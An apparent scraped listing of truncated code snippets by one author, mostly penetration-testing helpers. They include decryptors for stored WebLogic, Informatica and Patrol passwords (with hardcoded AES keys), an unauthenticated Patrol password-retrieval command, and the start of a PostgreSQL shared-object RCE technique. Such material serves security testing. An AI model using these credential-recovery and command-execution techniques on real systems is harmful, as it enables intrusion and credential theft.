gquere

#!/usr/bin/env python3
import argparse
import requests
import json
import urllib3
from urllib.parse import urlparse
import os
import re
from getpass import getpass

gquere

#!/usr/bin/env python3
import requests
import json
import urllib3
import sys


# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

gquere

#!/usr/bin/env python3
from Cryptodome.Cipher import AES
import base64
import sys

key = b'Mary had a littl'

data = base64.b64decode(sys.argv[1])

iv = data[0:4] + b'\x00' * 12

gquere

#!/usr/bin/env python3
# python3 port from https://github.com/L-codes/ctf-scripts/blob/master/crypto/weblogic_password.py
# /console/ login account
# -i ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/security/SerializedSystemIni.dat
# -f ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/config/config.xml
from Cryptodome.Cipher import ARC2, AES, DES3
from Cryptodome.Hash import SHA

import struct
import re

gquere

server.xml:

<Realm className="org.apache.catalina.realm.LockOutRealm">
    <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase" digest="sha-256" />
</Realm>

tomcat-users.xml (test values from https://www.techpaste.com/2013/05/enable-password-encryption-policy-tomcat-7/):

<tomcat-users xmlns="http://tomcat.apache.org/xml"

gquere

Patrol unauthenticated get remote password

./pconfig +get -p <port> -host <host> | grep defaultAccount

Patrol decrypt password

https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'0102030405060708414243444546474861626364656667689192939495969798'%7D,%7B'option':'Hex','string':'11213141516171810142639566470898'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)From_Base64('A-Za-z0-9%2B/%3D',true/disabled)To_Hex('Space',0/disabled)&input=RDIyMjZFOTRBMTg4NkY0MTc4NkFBQjk2MkQ0MUFBNTBGOUY1RUIwQ0EzQTJCMkYyMDFEQTMxNTJERDkxMTU2Ng

gquere

PostgreSQL RCE

Need Superuser rights.

Shared object

Simple SO to run blind commands:

//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <string.h>

gquere

#!/usr/bin/env python3
import argparse
import base64
import re
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad

parser = argparse.ArgumentParser(description = 'Decrypt Informatica passwords')
parser.add_argument('-k', '--sitekey', type=str, required=True)
parser.add_argument('secret', type=str)

gquere

#!/usr/bin/env python3
import argparse
import urllib3
import requests
import json
import sys


# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

gquere

If jconsole doesn't trust the remote server's CA then on Linux it will fail with

Connection failed: error during JRMP connection establishment; nest exception is: java.io.EOFException

On Windows I got this error instead (?):

Connection failed: non-JRMP server at remote endpoint

This is solved by downloading the server's certificate and converting it to a keystore:

true | openssl s_client -connect server.com | openssl x509 > serv.cert
keytool -import -alias serv -keystore serv.jks -file serv.cert